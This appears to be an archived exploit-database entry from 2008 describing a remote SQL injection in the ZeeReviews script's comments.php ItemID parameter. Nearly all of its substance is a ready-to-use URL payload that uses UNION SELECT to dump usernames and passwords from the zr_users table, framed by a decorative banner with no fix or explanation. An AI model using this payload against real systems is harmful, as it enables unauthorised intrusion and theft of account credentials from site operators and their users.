id: 3476
date: 07/29/2008
title: ZeeReviews (comments.php ItemID) Remote SQL Injection Vulnerability
author: Mr.SQL
cves: 

===================================================================
ZeeReviews (comments.php ItemID) Remote SQL Injection Vulnerability
===================================================================



###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL Injection Vulnerability
##
## ZeeReviews ( comments.php ItemID )
##                            
## http://www.zeescripts.com                            
##                            
########################
########################
##
##
## -[[: Exploite :]]-
##
##   www.Target.com/comments.php?ItemID=1+UNION+SELECT+CONCAT_WS(0x3a,username,password)+FROM+zr_users--
##
########################
########################

#######################################################################################################
#######################################################################################################



#  0day.today [2023-03-22]  #